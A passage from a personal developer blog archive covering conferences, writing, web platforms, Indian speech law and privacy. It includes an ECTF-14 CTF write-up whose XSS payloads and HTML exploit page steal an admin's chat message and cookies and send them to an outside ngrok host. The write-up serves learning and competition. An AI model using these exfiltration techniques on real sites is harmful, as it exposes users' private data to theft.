I was asking people about good interview questions, and one that I really liked was “How do you write an HTTP server using sockets?”. A lot of developers are stuck in this moat of “programming = software development”. And you can’t get over that unless you start thinking in terms of concepts. This is not me trying to get people to become Architecture Astronauts, but me trying to get people to understand how things work. I’ve interviewed people who have no idea about how HTTP works, and in my opinion you can’t really be a web developer without knowing HTTP. A fairly good filter for good web developers is whether they know the ins-and-outs of HTTP. And HTTP is not a programming challenge, but rather a conceptual problem. Similarly, if you work in the frontend, and you don’t know what the Same Origin Policy is, I am not gonna hire you. (“Is it implemented on the browser or the server?” is a another good question). The point I’m trying to make is that you need to get a layer above your language’s standard library and understand how things work. Learning ActiveRecord is awesome, but do you understand how it works?
Ship Products

Doesn’t matter if they are small, or made in a hackathon. As long as its shipped, we’re cool. If its not, come back when you’ve shipped it.
Have side projects

This is slightly harder to do, but far more rewarding. Make sure that your side-project is not something you expect to make money out of, and that it has a fairly reasonable scope. Side projects are an excellent breeding ground for you to try out new technologies, and play around with new languages. Its a really good breakaway from work-things as well, on top of that.
Read technical books

As a start, I’d recommend everything that codinghorror has suggested here and here. There are a lot of good books listed on hackershelf.com as well. My personal favorite is Don’t Make Me Think, which is a book on Web Usability and something I think every developer and designer should be forced to read.

Thanks to Shashank Mehta for discussing these ideas with me and helping me frame this post.

HillHacks 2015

2015-07-20T00:00:00+00:00

A little while back, I came across HillHacks, a conference in Dharamshala about “hacking and making in the Himalayas”. I was instantly hooked. It took a lot of scheduling troubles, but I decided to stay for the entire unconference, which started at 23rd May.

Its hard to describe the HillHacks experience in a single blog post. I met so many amazing people from all over the world. Learned a lot of different things. I Had a lot of fun teaching some other things. I helped organize some of the stuff, and managed to stay awake an entire night while participating in an CTF. And on top of that, got to eat delicious food.

HillHacks as an event, was divided into two segments:

An unconference (23rd May - 3rd June)
Main Conference (4-7 June)

A lot of people had arrived before me at the venue and taken care of the basic infrastructure. We had internet connectivity via two local ISPs. We had IPV6 connectivity via a tunnel in Belgium as well.

There were a lot of fun activities planned everyday: from unicycling to skateboarding and playing Cards against Humanity; it was a lot of fun living with so many strangers and trying to figure out ways to help.

I did a talk on SDSLabs, a quiz for everyone, and an introductory session on CTF contests. We then participated in a CTF organized in Germany as Team HillHacks. On the last day of the conference, I did a [talk][josd-talk] on “The Joy of Software Development”, which is a book I am working on.

For the first time in my life, I met people who actually use BSD. And to make it even more amazing, I met NetBSD Kernel developers, people on the BSD Security Team, and people who prefer OpenBSD over NetBSD (I’d never really cared for the distinction, as a Linux user)

We did a lot of hacks, including running an MPD Daemon and streaming it over IceCast. I also spent a lot of time cubing and teaching people how to solve Rubik Cubes. My times have also improved somewhat as a result. Thanks to trouble, I also learnt how to solve a MegaMinx.

As part of the School Outreach program (organized by the brilliant Tink), we taught kids about Codes and Ciphers, programming, speedcubing and lots of other things. The kids also performed in the final Gala Show giving us brilliant performances in 3 different plays (all 3 schools had their own plays).

I learned a lot of different things: how to start with Kernel Programming, DNSSEC, Retro Gaming. Thanks to a few dedicated volunteers, we even made a 8-inch Telescope that made staring at the night sky so much fun. We had a session on Typography, a story telling session in Malayalam (translated to English on the fly). I even learnt a bit of Emacs.

The list is so long, I don’t think I can do it justice in this single blog post.

The most amazing part was not the technical things, but the community itself. sva would often say that everyone of us has “sudo access on the conference” (geekspeak for full authority). Each of us helped organize it, any way we could. The community got together to setup the stage, tents, network and the entire infrastructure at HillHacks. Zainab even has a blog post on social cooking at Hillhacks.

As I sit here at the venue, it has been 2 weeks of fun and awesomeness here at HillHacks. I leave with lots of memories and hope to be here next year.

If this blog post interests you, be sure to check out hackbeach as well. We are doing a mini-conference around November in Kovalam.

Thoughts on Writing

2015-06-07T00:00:00+00:00

I have always wanted to be a writer. I think secretly us all reader-folk have that ambition. The joy of getting across your thoughts to another person without ever having met them is enormous.

Most of my writing time these days is spent over email, chat or my not-so-frequent blog posts. I tend to do a lot of research while writing, and it takes up a lot of time. As such, my writing output tends to be diminutive compared to what I’d like.

However, if you’ll go through my blog posts and emails, I write a lot about trivial things. Things that many people have already written about. Things that have probably been discussed to death, and where I have very little chance of actually coming up with something new.

Should I still go ahead and write about it?

This question has been bugging me for a while, especially as a blogger. I mostly write on technical topics these days. For instance, I have given talks on [Software Development], [UX Design], and even [Bitcoin]. I am nowhere close to being an authority on any of these things. Even in my specialized field of Web Development, there are so many things that I’m only barely aware about. So many things I am yet to even form my own opinions about. Topics I don’t even know exist.

When I go and read an article about Software Development from Joel Spolsky, or an article on Security by Bruce Schneier, or something on Startups by Paul Graham, or tptacek on Hacker News; I instantly sit back and take notice: I know their credentials and the fact that they are speaking authoritatively on the topic. However, what can I, a meager undergrad with almost zero experience, write on such topics. Why should I even try, when there are people hundreds of time better who understand these things a thousand times better than me.

In retrospect, this sounds quite similar to the Imposter Syndrome; and I’m not sure if this is exactly the same thing. I don’t get a feeling that I’m a fraud. I totally understand my own capabilities and successes, but the mere fact that there are people far better at what I’m doing is enough to dis-hearten me.

I’ve given this a lot of thought. A really good summary of my response is in the following answer by James Erwin, author of Rome Sweet Rome in a reddit AMA to a question asking for writer advice:

And if you’re going to write, write what you want to write. The odds against any creator are insane. If you’re going to devote months of your time, don’t let it be for an idea you think will sell. Odds are it won’t. Write something you want to write, or need to write. Write for yourself before anyone else. I’d rather read someone who is excited and passionate about what they want to say than someone who’s obviously trying to say what they think I want to hear.

— James Erwin

I write, despite all these doubts, for the following reasons:

Self-learning. A blog is an excellent way to keep track of your self-learning. Its amazing to come back a few years later and see the things you were struggling with before. Its equally amazing to do a trivial google search for an issue you face and find your own blog post or stackoverflow answer on the same.
Sharing Knowledge. Yes, there are people who might know it better, but that shouldn’t mean I should keep my knowledge to myself. That would go against all the values that I stand for.
Network Effect: Not in the strictest sense of the word, but my friend Shashank recently brought this up. I have a circle of people who know me and would vouch for my credentials. For the same reason, they are more likely to trust me as source, instead of a third person who they have no knowledge of.
I love writing. The mere process of putting words down is enchanting for me.

The next question that rises is: “What should I write about?”. Ruling out things I have no clue about, that still leaves a large number of topics I can cover. I am interested in UX Design, Hackers, Computer Security, Software Development, rationalism, skepticism, Free and Open Source movements, Political activism, Technocracy with a passing interest in several other fields such as cosmology and geek culture.

I am not going to pick one every day and write about something new. I don’t want to write something rubbish just for the sake of writing it. I ultimately want to write because I have something to say. It doesn’t have to be unique or ground-breaking. What matters is that I want to write about it.

A few days back someone contacted me on facebook asking me advice on getting started with web development. I get a lot of these queries, mostly over facebook, email, and quora. Our conversation went back and forth with me suggesting resources, and he getting exceedingly confused over whether he should use codecademy or udacity, or coursera or something else.

I have devoted a lot of time in my life to teaching people the nuances of these things. I have mentored many people, and acutely know the issues a beginner faces. In turn, I had an amazing mentor who taught me the importance of always learning things.

All of this lead me to realize one fact: I have been writing a lot about Software Development. Unfortunately, a lot of it is in private emails and chat. And I wanna write more about it, on a public medium.

So, I’m announcing the next thing I’m working on: a book called The Joy of Software Development. A few obligatory links:

The source code is available on GitHub.
Its licensed under the CC-by-SA 4.0 license.
The canonical url for the site is https://josd.captnemo.in/
Its hosted on the excellent GitBook platform, which automatically publishes each version as epub, mobi, and pdf as well.
Who the target audience for the book is.
You can file an issue for critique on GitHub

As expected, all the development, writing, and discussion on the book will be in the public, mostly on GitHub. I am writing this book, because I feel it needs to be written. I don’t expect it to be published, but that won’t stop me from writing it.

Artur Siekielski recently came across it, and wrote the following:

The book you’re writing looks very good! It’s filling a niche as I don’t think there are any modern books that focus on “bird’s eye view”, and I see it would be helpful for many programmers to refresh knowledge.

That gave me a bit of validation, as the only person who’d read it so far were my close friends.

If you wanna support its development, you can do one of the following:

Poke me on twitter or email and let me know you want to read it
Subscribe to the mailing list (I’ll send out updates there)
Watch or Star the repo on GitHub.
See the CONTRIBUTING file on github for contributing to the text.

Asking for Donations might sound weird to some. I don’t really need the money, but I think I’d get an additional sense of responsibility towards finishing it if people start giving me money. I will be donating the entire proceedings to EFF.

Medium abuses nofollow

2015-04-06T00:00:00+00:00

Update: Since I published this post, I have changed my opinion somewhat on the matter. This post is quite confrontational and I didn’t mean it to be that way. Medium is not wrong in this matter, but I still think we need to look for better solutions. I have since been working on a proposal/idea that would use machine learning to “solve” this problem, instead of side-stepping it.

I call medium a “mostly good” platform for lazy writers. A lot of people have written about its excellent typography, or it being the next “big publishing platform”. I’ve used medium in the past, and while it does have its benefits, I have stopped using it.

My primary reason was that I already have a blog, where I can control the entire experience. This is the same reason why New York Times does not start publishing articles on Medium.

The other reason is nofollow abuse.

Medium hosts more than 1M indexed pages. It has around 650k users currently by a conservative estimate. Rounding it to 700k to account for other users, collections, and other internal pages, it leaves us with around 300,000 articles on medium.

A basic tenet of the web is linkability. That is what Tim Berners Lee meant when he talked about HyperText:

HyperText is a way to link and access information of various kinds as a web of nodes in which the user can browse at will.

Over time, the web has evolved, and is now not just limited to human users, but to computers as well. This is an important consideration on which the web rests today. The biggest example of this is Google Search, which uses these links to “follow, spider, and index” the web. Google uses this linking information to build a citation index, which gives us the quality of a web page depending on the quality and number of sites that link to it.

If you know a bit or two about SEO, you might have heard of shady backlink techniques, which essentially amount to you getting links from an established site. This often takes the form of user-generated content such as comments and answers.

While fighting spam is important, it is far more important to make sure that web remains linked, that people are credited for the content they create. Medium hosts 300,000 articles published by half a million users, and yet none of these links back to external website, because of something called “rel=nofollow”.

When a link has a rel=nofollow attribute, search engines do not count it as a citation in their index. While this may be the right strategy for comments on a wordpress blog to prevent spam, this is not the right way to move forward if you want to “revolutionize the publishing industry”.

While medium is not as bad as some other sites in this regard (like quora, which even blocks the internet archive), it is very important because it portrays itself as a “publishing platform”. This means, medium is made up of articles, blog posts, with lots of outbound links compared to, for instance, StackOverflow answers (which solved this problem back in 2011).

If you publish content on medium, and provide relevant links for your readers, remember that these links are not considered as relevant by search engines.

Medium has said that this is not a top priority at the moment for them.

I understand completely. Handling spam would be a far more harder problem to solve than just blacklisting all outbound links. But we cannot go this way, if we want an open web. We need publishing platforms that cite content, and not blacklist it. This is why I write content on my own blog, and not on medium.

Blog post on recent talk

2015-03-20T00:00:00+00:00

So I recently did a talk on Joy of Software Development. You can read more about the talk here (link includes slides and list of topics covered). This post is devoted to the references I’d promised to link to in the talk. Since it was an introductory talk, and I didn’t want to bore people to death, I decided to cover lots of topics at a shallow depth, instead of covering a few topics deeply.

This means that I need to post more material for people to follow up on. So, this is that reference blog post. Make sure you have a copy of the slides open as you go through these links.

Update: I also gave this talk (with a few updates) at GeekSkool in October 2015.

Software Development in general

Hiring in software industry is broken
Breadth First Learning
Recommended readings for developers by Jeff Atwood (codinghorror)
Ship v1, even if it sucks
Ship early, ship often
Never rewrite, always refactor by Joel Spolsky
The Joel Test to score a software company.

Software Security

Security is the opposite of obscurity
OWASP Top 10
Software Security course on coursera
CTFTime - See upcoming CTF contests
SmashTheStack - Learn buffer overflow attacks
Nebula Exploit Excercises
Backdoor - Security CTF platform for beginners by SDSLabs

Starting Advice

Agnostic Software Development

Free and open source development

Why Open Source misses the point of Free Software - by Richard Stallman
Open source definition
Choose a license
What is free software?
Why Free Software Movement is important
Mozilla mission statement

Version Control

Tests

During the talk, I decidedly used the term TDD incorrectly. TDD technically means going test first, but I used it as an introduction to testing in general. This was intentional. The links here will use TDD in the correct sense.

REST and APIs

Unix Philosophy

The epic Knuth vs McIlroy story
Zawinski’s Law
http://onethingwell.org/
Wikipedia article on the topic is surprisingly good
Good examples of pipes

Books

These are books i absolutely recommend every software developer to read, in order.

Other than these, I recommend reading Code Complete, Mythical Man Month, and everything by Jeff Atwood and Zach Homan, but only after you have read the above 2 books.

How to get better at Software Development?

This is just a small list of topics I cover in a recent blog post. This is only present in the updated version of the talk which I gave at GeekSkool. You can read the blog post here to look at the points I make.

Phew. That was a lot of links. If you are ever interested in learning more about software development, feel free to contact me. If you ever feel like chatting with me, I’m usually online at chat.sdslabs.co.

Buxton's Rule

2015-03-08T00:00:00+00:00

I consider myself a UX enthusiast. I consider that term to aptly describe my interest in UX. As I’m deeply involved in many UX and design decisions, I try to be well read on design and UX principles. While reading a discussion about iPhone prototypes on HN in June ‘12, I came across this comment:

Goes to show what it takes to achieve excellence: lots of trial and error. Produce at least 3 alternatives for every design decision (Bill Buxton agrees).

— mstuherl

It sounded so basic, yet often I see designers trying to defend their first design, because it seems good enough to them. No good design is ever born at the first step. Just like any other process, it takes multiple iterations to perfect it.

I recently got in touch with Morgan (mstuherl on HN), and thanked him for his comment. Here’s what he said when I told him I wanted to dub it mstuherl’s rule:

Hah! My name’s Morgan, so you can call it Morgan’s Rule if you like, but it comes from Bill, so Buxton’s rule would be more appropriate. His book Sketching User Experience contains yet more wisdom!

So thats what I’m calling it:

BUXTON'S RULE
Produce at least 3 alternatives for every design decisions.

scytheCTF and Updates

2015-02-27T00:00:00+00:00

February has been an interesting month for me. I haven’t been programming a lot, but have definitely been writing a lot. I have got a few more upcoming projects as well, which I’d love to announce soon.

We recently held a short 8-hour CTF (scytheCTF) on Backdoor. I made two challenges for the CTF:

Both of these problems were rush jobs because of several reasons:

We didn’t have much time to set the problems.
We didn’t expect much participation in scytheCTF.
scytheCTF was a test CTF, just to figure out any issues with the internet launch of Backdoor.
scythe is also supposed to be beginner friendly, unlike our annual BackdoorCTF, which will include much harder problems.

I had a lot of fun with @kandoiabhi in setting the problems. It was also great seeing @DefConUA participate in such a small-scale contest.

Other than scythe, we recently had our annual SDSLabs trip to Rishikesh, which I enjoyed a lot. I also wrote a small post on my work setup.

How I found a bug in HackerEarth

2015-02-12T00:00:00+00:00

Source

I am not a competitive programmer. I love programming, but more so I love building things. As a result, I rarely participate in coding contests. Even when I do, I try to use languages like Ruby and Python just to see if I can do it my way, so to speak.

While trying a contest in Ruby, I realized that I could not use the ruby prime library. This is a standard library in Ruby for a long while, and HackerEarth platform runs on 2.1.1, which is quite new.

I reported this as a bug to HackerEarth in September ‘14. A quick reply from HE made me realize that they weren’t understanding the issue:

Modules like mathn or erb are part of standard library. They are available.

Try using, require ‘erb’require ‘mathn’ in code editor.
However 3rd party libraries are not available.

I decided to do some tests and check all standard libraries for their availability. For those unfamiliar with Ruby, this is how you load a standard library in ruby:

require 'prime'

Using the HackerEarth API, I was able to write some quick code that tested all expected libraries:

while read lib; do
  SOURCE="require%20'$lib'"
  echo "Testing $lib"
  curl -s -d "client_secret=API_SECRET&lang=RUBY&async=0&source=$SOURCE" http://api.hackerearth.com/code/run/ > $lib.json
done < libs.txt

Here libs.txt contains a list of all standard libraries. The above code is in bash, and makes use of curl. Parsing the results, I replied with the following:

Requiring the following libraries raises a missing error:

coverage - RE
extmk - RE
fiddle - RE
io/console - RE
json - RE
minitest - RE
minitest/benchmark - RE
minitest/spec - RE
mkmf - RE
objspace - RE
prime - RE
psych - RE
racc - RE
rake - RE
rdoc - RE
rexml - RE
rinda - RE
ripper - RE
rubygems - RE
tk - RE
win32ole - RE
xmlrpc - RE

HackerEarth admitted the issue (I posted code to replicate on github), and have since worked on it. I just ran the tests again, and only the following libraries are unavailable now:

curses - RE
dbm - RE
debug - RE
extmk - RE
gdbm - RE
generator - RE
iconv - RE
racc - RE
readline - RE
rexml - RE
rinda - RE
tk - RE
win32ole - RE

A few of these are understandable (win32 since HE platform runs on Linux, and tk, which is a graphical library). A few of these are unavailable in Ruby 2.1.1 (I copied the list of libs from the 2.1.3 docs).

Kudos to HackerEarth for fixing a bug that very few of their users would have faced. All the source code for this post can be found at github.

Note: This article was copied from HackerEarth because they are shutting down their notes platform.

I am offended

2015-02-06T00:00:00+00:00

To start with, here’s a piece of art that is meant to offend you:

The above is an artwork by MF Hussain. Its was sold as an untitled work by Hussain to a private collector, but was named Bharat Mata later when it was sold in an auction.

Were you offended by looking at it? Maybe. Does it look vulgar and offensive to you? Perhaps. What should you do as a result?

CLOSE THE TAB!

Seriously, India. The right thing to do when you are offended is not to lynch a person to death, or to issue a fatwa against singing the national song. The right thing to do is this:

The right to get offended in India is a result of the way our constitution curbs the freedom of speech. However, these restrictions were not in the constitution that was passed when India was made a republic (26 Jan 1950). It was added as the First Amendment (ironic, I know), which passed in June 1951.

In the 18 months that passed between these two events, Indians had the right to absolute freedom of speech. I won’t go into the details of why both Nehru and Patel thought of bringing these restrictions (for the better of India), but needless to say, the reasons are no longer valid.

However, I found a curious piece of irony while researching this:

One of the prime opponents to the First Amendment restrictions was Syama Prasad Mookerjee, a long time RSS activist, founder of the Bharatiya Jana Sangh and widely regarded as the godfather of Hindu Nationalism.

And now today, 64 years later, these restrictions are getting enacted into even more draconian laws. One such law is Section 66A of the Information Technology Act.

Kapil Sibal, former union minister writes about it:

Allowing the government to regulate the internet is a recipe for disaster. Government being what it is, it would use such power to further its own ends.

However, he gives in to the diplomatic reasoning and writes further:

I know where I stand. I am for freedom of expression, but there are no absolutes in life. Limitless freedom contains within it the seeds of conflict. We must eschew conflict and embrace freedom, for peace and harmony.

Note that back in 2012, Kapil Sibbal had spoken in favor of Section 66A, citing it as a tool to protect women online. He seems to have reversed his stance since.

This is what Tushar Mehta, Additional Solicitor General has to say on the necessity of the act:

[…] every institution and every person right from the President can be subjected to criticism and it is people’s fundamental right to free speech and expression but such rights do not cover grossly offensive comments and posts on social networking sites.

AIB recently tested their rights by making a grossly offensive video and posting it on social networking sites. A lot of people were offended. The video was taken down as a result.

Did the people who were offended see the video? Yes, probably on YouTube. But the recordings are still floating around, and are available on torrents very easily.

You see, the internet is a resilient beast. You can’t control it, or bend it to your will. It does not run by your rules, and your sense of sensibility. It has no concept of right or wrong. It just is.

A nation where I am afraid to post critical views of the government or discuss events that might offend someone is not a nation worth living in.

The internet cannot be regulated. You might certainly think of it as possible, but we will always find a way.

If you are offended it is your problem, and frankly lots of things offend lots of people. - Salman Rushdie

I don’t think I will ever see the first amendment repealed in my lifetime. However, I’m gonna try my very best to get the Supreme Court to re-evaluate Section 66A as unconstitional and over-reaching.

If you want to let the government know of your thoughts on the matter, the Assistant Solicitor General (representing the Government in the case) can be reached at [email protected]">[email protected].

Are you a fighter pilot?

2015-01-28T00:00:00+00:00

As part of a pre job interview for a position as a security consultant, I was asked this question. The interviewer expanded the question further as :

Given the choice between a luxurious journey in a passenger jetliner (flying business class) and a thrilling trip as a fighter pilot, which one would you choose?

My immediate reply was (without a single doubt): “I’ll take the fighter jet, thanks.”

Then the interviewer tried to dissuade me from my choice: “Its not as glamorous as it sounds. Its a terrible job flying a jet plane. There are lots of complications, you are literally defying death, and even the pay isn’t that good.”. He then spent quite some time explaining the luxuries and comforts that we take for granted in a passenger jet, and those that aren’t available in a fighter jet. “You can’t even piss properly”, he told me. “And there’s free booze on the Boeing.”

Me (after some deliberation and moment of self-doubt): I’d ultimately like to have my own private jet, but I’m willing to strap myself to a 300 million dollar plane just trying to get there. I’d take that over a passenger jet any day.

For those who didn’t get the analogy: He was trying to convince me to join a high risk job, where I’d be working late nights doing what I love. But it also means giving up tons of luxuries and comforts that I could get at other companies.

I’m sure that I’m the fighter jet kind of person, I’m just having difficulty deciding what jet I wanna fly. If you have an opening for a Full Stack Developer/Security Consultant, shoot me a mail.

Yu were mislead

2015-01-13T00:00:00+00:00

I was eagerly awaiting the release of Yu Yureka, which has been widely hailed as a great budget phone by most reviews. I won’t go into the details of the phone, but rather the flash sale that took place on 13th Jan ‘15 (on amazon.in). Far from being a well-managed affair, the website was plagued with issues, and went down for everyone a couple of minutes before the sale.

Still, a few lucky people were able to buy the phone (sadly, I wasn’t one of them). Micromax said that they had to close registrations for the sale early and had around 3 lakh people lined up for the sale.

This is how the yuplaygod.com homepage looks right now:

Clearly, they had 10k units for sale, and one in every 300 people should have bought it, right? Wrong!

It seems Yu (the brand new subsidiary of Micromax) is not above lying. There were only 3000 devices on sale today, out of which only 2657 were claimed, after which the sale was shut down.

How do I know this? The way deals work on amazon is once you are on a deal page, the client keeps checking the deal status every few seconds so as to let you know as soon as its status changes. This deal status response does not only include the deal status code (say EXPIRED/SOLDOUT/AVAILABLE), but also includes the deal’s nitty details.

These details include:

totalCouponCount: 3000
claimedCouponCount: 2657
percentClaimed: 88
type: LIGHTNING_DEAL
title: Yureka
dealPrice: 8999
currentPrice: 12999

I’m not sure why Yu would try such a tactic (hype the device at low cost, overstate sales figures and then switch to a higher price), but it sure does not sound nice if you are one of the 3 lakh people who lined up to buy the device.

References

Since its my word against amazon, here’s a simple way to confirm the deal details for yourself:

Visit http://hurl.it/ (I don’t own this site)
Change the request method to “POST” from “GET”
Enter http://www.amazon.in/xa/dealcontent/v2/GetDealStatus where it says yourapihere.com
Click on “+ Add Body Button”
Paste {"requestMetadata":{"marketplaceID":"A21TJRUUN4KGV","clientID":"goldbox"},"dealTargets":[{"dealID":"ea9fef51","itemIDs":null}]} into the box that appears
Click on “Launch Request”
Scroll to the bottom to see the dealStatus

As an alternative, here is a permalink to the request.

Update: If you try to replicate the above steps, you will notice that the deal response is now blank. My guess is that the deal was deleted from the servers. However, the permalinks above should still work. I’m still waiting for any official word from either Yu/Amazon.

Here’s a better (edited) photo that Yu might wanna use:

Thanks to Shashank Mehta for the title suggestion.

Thank You Pat

2015-01-03T00:00:00+00:00

I’m a lazy reader. I’ll often start books and leave them halfway, often juggling 3-4 books at the same time. I read in sprints, often spending a few days just finishing lots of books followed by reading nothing for the next few weeks, perhaps. But that doesn’t mean I don’t appreciate good books. This is the story of how I found my favorite writer, and how I discovered the wonderful books that I enjoy so deeply.

I don’t write a journal regularly, but if I did, one of my favorite things to do with it is to figure out the little things that matter; to separate out the strands and understand the connections and the motivations behind where I am today

It is our choices…that show what we truly are, far more than our abilities.

Albus Dumbledore

What I love to do is figure out those tiny choices, and the reasoning behind them that led me to today.

I read Patrick Rothfuss’s “Name of the Wind” a long time back. It was an amazing book, which I found on a site called bestfantasybooks.com. In my defense, I was an avid Harry Potter fan at the time, looking for similar books, and I’d decided that reading the best fantasy would be good preparation before I could write my own.

As it so happens, “Name of the Wind” was a superb book. The kind that made me squirm in delight when I saw that the sequel was already out. So I did what any self-respecting book-lover would do: read it in a single stretch, screwing up my exams in the process. I didn’t sleep much for those few days (its a pretty long book), but I enjoyed every bit of it.

I started following Pat’s (hilarious) blog, where he often posted tidbits of his life, and came across his review of “The Alloy of Law” by Brandon Sanderson:

…
My last point is that Sanderson has now been added to a very short list of authors. Specifically, the list authors whom I wish to kill so that I might eat their livers and thereby gain their power.

Any author that Patrick wanted to kill sounded like a great one to read, so I started “The Alloy of Law”. I finished the book in a few short hours. Its paced excellently, and the action keeps on coming. I’d never really read much urban fantasy before, and despite me never having read Mistborn (Alloy is a sequel to the Mistborn trilogy) I was sucked in.

And here I am, counting down the next few days, waiting for the release of Firefight, Sanderson’s next book.

So, thank you Pat. Thanks for introducing me to my favorite writer. Thank you for writing those wonderful books, and keep on reviewing all that you love (I’m reading “Through the Woods” next).

If you are looking for a nice fat book to read next, I heartily recommend “The Name of the Wind” and “The Way of Kings”.

ECTF-14 Web400 Writeup

2014-10-20T00:00:00+00:00

We recently participated in ECTF-14 and it was a great experience. Here’s a writeup to the web400 challenge:

Problem Statement

The chat feature was added to Facelook website and to test it, founder of the company had sent a message in chat to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty. [Annoying Admin]

The challenge consisted of a simple signup and a chat message sending feature, where anyone could send a chat message to anyone. However, on the loading side, the chat message was loaded using Javascript. The code for loading the messages looked like this:

function load_messages (id) {
    $.ajax({
    url: "http://212.71.235.214:4050/chat",
    data: {
        sender: id,
    },
    success: function( response ) {
        eval(response);
    }
    });
}

The url above responded as the following:

$('#chat_234').html('');$('#chat_234').append('dream<br />');

Where dream was the message I sent. My first attempt was to break out of the append function, and execute my own javascript, by trivially using a single quote. Unfortunately, the single quote was escaped and removed by the backend.

Next, I tried using ' instead of a single quote, and it worked:

Message Sent: '+alert(1)+' Message received: $('#chat_234').html('');$('#chat_234').append('dream<br />');$('#chat_234').append(''+alert(1)+'<br />');

This seemed simple enough to exploit as XSS, so I quickly wrote up my exploit:

$.get(‘/chat?sender=2’, function(data){ $.post(“http://my-server.com/ectf/index.php”, {content: data}); });

This utilized the fact that we knew Founder’s user id to be 2. The code worked perfectly fine with my test accounts, but something weird happened when the challenge server (admin) ran it. I would get a GET request on the above mentioned url, instead of a POST. Also attempting to generate the URL using concat or + or any operator such as : "http://my-server.com/index.php?data="+document.cookie made a request to http://my-server.com/index.php?data=. Anything I appended was just ignored, plain and simple.

After attempting to get a POST request with cookie or session data for a lot of time, I realized that the problem was not XSS, but rather a CSRF attack. This was because the data was being loaded in a Javascript request, instead of JSON. Javascript request (using a script tag) can be made across domains, which meant that any website could access the data by using the proper script tag. We just had to add a script tag with its src set to http://212.71.235.214:4050/chat?sender=2. This would automatically add the chat message to a div with id chat_2.

The only issue was that Admin had to visit our site, with proper cookies, and we know already that admin has been sniffing for links and visiting them. So I wrote up my second (this time working) exploit:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>ECTF14 web400 exploit</title>
</head>
<body>
  <div id="chat_2"></div>
  <div id="chat_106"></div>
  <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
  <script>
    $(document).ready(function(){
      $.getScript("http://212.71.235.214:4050/chat?sender=2");
      setTimeout(function(){
        var text = $('#chat_2').text();
        $.post('http://20c7d53b.ngrok.com/', {content:text});
      }, 1000);
    })
  </script>
</body>
</html>

Unfortunately, the exploit did not work on Chrome because Chrome refused to run the script as javascript, because it was being served with a mime-type of text/html. It worked in firefox, and I crossed my fingers as I sent out the link to the above page to admin in a chat message. I knew admin user was using PhantomJS to run my javascript (because of the user-agent in numerous GET requests I got earlier). So, I was hopeful that this would work.

I was listening at the url, and sure enough as soon as I sent a link out to this page, admin ran my javascript and I got the flag in a POST request.

The flag was bad_js_is_vulnerable.

Living a public life as a privacy advocate

2014-08-14T00:00:00+00:00

If you’ve known me for a while, you might know me as a privacy conscious individual or perhaps as someone who leads a very public life. The truth is that I lead both these lives; and while that may sound oxymoronic to some, its perfectly clear to me.

I’m a huge privacy advocate. I still remember the day I woke up and read about PRISM first thing in the morning. My reaction was a mix of disbelief, anger, and frustration. In the aftermath of the PRISM reveal, I made a few choices: I would retain ownership of my data, and I’ll do whatever I can to promote tools that help you do this.

I’m still working on both fronts, but the reality of the situation is that we are surrounded by walled gardens. I decided to make the best I could of these gardens. I remember reading a weird suggestion: only post public stuff on facebook; and I was somehow convinced to try it out.

But I took the experiment a step further. If the service is something I can’t control myself (say self-hosted), everything I do with it should be for public-viewing. Since then, I’ve rarely posted anything private on facebook.

Other services where I follow the same advice include:

Goodreads - Whatever I read is public information, along with real-time updates of my reading habits.
Last.FM - All my music tastes, along with real-time upates on what I’m listening to.
Facebook - All of my posts on facebook are public. I do have some private messaging interactions on facebook (I never initiate them) and usually move them to email if they grow important.
Twitter - Tiny byte-sized thoughts and observations are again, public. My account is set to public, which doesn’t mean that I trust twitter with my data. It just means that I expect my data to be public.
GitHub - One of the few companies I trust to keep my data safe. Barring a few exceptions, everything I do on github is public, ready for anyone to analyze and use as public data. In fact, github makes all of its timeline data available to public as a dataset on bigquery.
Bookmarks - Most of my bookmarks are public via xmarks. I haven’t synced it in a while since XMarks and Chrome Sync don’t work well together, but plan to do something about this as well.

Along with all this, most of the writing I do these days is for public consumption, either via my Blog, or some platform like Quora, StackExchange, or Medium.

Why

My reasoning behind keeping all of my online life public is twofold:

This creates a public archive of my life, accessible to everyone.
It doesn’t give me an illusion of privacy when there is none.

In reference to (1) above, I recently setup Google Inactive Accounts, and have to commend Google on the execution of the concept. Be sure to check it out at https://www.google.com/settings/account/inactive.

Disadvantages

This lifestyle choice is not without its comebacks. Stalking me, for example, is very easy. So is probably impersonating me as well. However, these are risks I’m willing to take in order to lead a public life.

Exceptions

By now you might be thinking of me as a pro-facebook share-everything kind of guy. But that’s not completely true. I do have clear limits on what counts as public and what does not. I value my privacy (and that of those close to me) very dearly.

For instance, I count my photographs as something very private. I almost never post public updates anywhere with my picture in it. Perhaps its because I never had any phone with decent camera. Whatever the reason, I try really hard to keep my pictures off the internet.

Another related issue is when the update would involve someone beside me. For example, my sister was recently engaged and I didn’t go on a social update spree telling the whole world about it, because I value her privacy.

My simple rule of thumb is to ask for permission, rather than beg for forgiveness as a person’s privacy is far more important.

What was the first project on GitHub?

2014-08-02T00:00:00+00:00

Note: This is cross-posted from Quora where I wrote this answer initially.

The first project on GitHub was grit. How do I know this? Just some clever use of the search and API.

Here’s a GitHub search to see the first 10 projects that were created on GitHub. The search uses the created keyword, and searches for projects created before 15 Jan 2008.

They are (in order of creation) (numeric id of repo in brackets):

mojombo/grit (1)

Grit gives you object oriented read/write access to Git repositories via Ruby. Deprecated in favor of libgit2/rugged
wycats/merb-core (26)

Merb Core: All you need. None you don’t. Merb was an early ruby framework that was merged to Rails No longer maintained.
rubinius/rubinius (27)

Rubinius, the Ruby Environment Still under active development
mojombo/god (28)

God is an easy to configure, easy to extend monitoring framework written in Ruby. Still actively maintained, and use by GitHub internally as well, I think
vanpelt/jsawesome(29)

JSAwesome provides a powerful JSON based DSL for creating interactive forms. Its last update was in 2008
wycats/jspec (31)

A JavaScript BDD Testing Library No longer maintained
defunkt/exception_logger (35)

The Exception Logger logs your Rails exceptions in the database and provides a funky web interface to manage them. No longer maintained>
defunkt/ambition (36)
technoweenie/restful-authentication (42)

Generates common user authentication code for Rails/Merb, with a full test/unit and rspec suite and optional Acts as State Machine support built-in.Maintained till Aug 2011
technoweenie/attachment_fu (43)

Treat an ActiveRecord model as a file attachment, storing its patch, size, content type, etc.

I’m sure the id from 2-25 would be taken up by many of the internal GitHub projects, such as github/github. To get the numeric id of a repo, visit https://api.github.com/repos/mojombo/grit and change the URL accordingly.

How does the sdslabs.co.in domain name work?

2014-07-27T00:00:00+00:00

